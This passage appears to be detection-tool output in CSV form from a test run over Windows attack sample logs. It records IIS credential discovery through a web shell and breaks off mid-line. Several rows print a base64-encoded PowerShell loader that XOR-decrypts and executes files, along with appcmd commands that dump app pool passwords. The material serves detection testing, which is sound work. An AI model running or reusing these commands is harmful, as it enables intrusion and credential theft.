AbAA7AA==  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe""  list vdir /text:physicalpath  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppools /text:name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkA